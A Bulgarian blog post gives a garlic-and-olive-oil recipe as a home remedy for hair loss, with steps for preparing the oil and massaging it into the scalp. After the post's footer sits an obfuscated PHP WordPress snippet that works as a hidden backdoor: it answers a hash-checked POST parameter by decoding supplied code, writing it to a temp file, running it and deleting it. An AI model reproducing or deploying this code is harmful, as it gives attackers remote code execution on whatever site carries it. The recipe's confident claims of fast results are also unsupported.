Как да приготвим олио от чесън срещу косопад | Косопад

Как да приготвим олио от чесън срещу косопад

kosa-chesan-1

Вече сте изпробвали много рецепти срещу косопад, но все нямате успех? Олиото от чесън е сред най- известните методи срещу падането на косата, тъй като е ефективно при всеки тип коса, а резултатите идват бързо.

Вярно е, че чесънът няма особено приятен аромат. Но от векове е известен със силните си лечебни качества. Чесънът е много полезен и при справянето с различни проблеми, свързани с косата, включително и косопада.

Помага за възстановяването на косата, прави я по- силна, действа стимулиращо върху израстването на новите косми.

chesan-3

За да приготвите олиото от чесън, ви трябват:

1 Две скилидки чесън

2 Осем с.л. зехтин екстра върджин

Сипете чесъна и зехтина в тенджера. Чесънът трябва да е обелен, а зехтинът да го покрива изцяло. На бавен котлон сложете сместа да се загрява. Когато ви замирише на мазнина, значи е готово. Свалете и оставете да изстива.

Пресипете с стъклено шише с херметическо затваряне. Сложете да престои на тъмно поне 24 часа.

Как се използва олиото от чесън?

Нанесете част от сместа по скалпа и косата, като извършвате леки масажиращи движения. Сложете си шапка за баня или найлон, увийте с кърпа и стойте така поне два часа. Ако ви притеснява миризмата, правете процедурата вечер.

След това се измива косата както обикновено.

Препоръчително е да се прави поне три пъти в седмицата. Ако обаче косата ви започне да се омазнява, намалете до 1- 2 пъти.

24. септември 2015 15:09:21 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}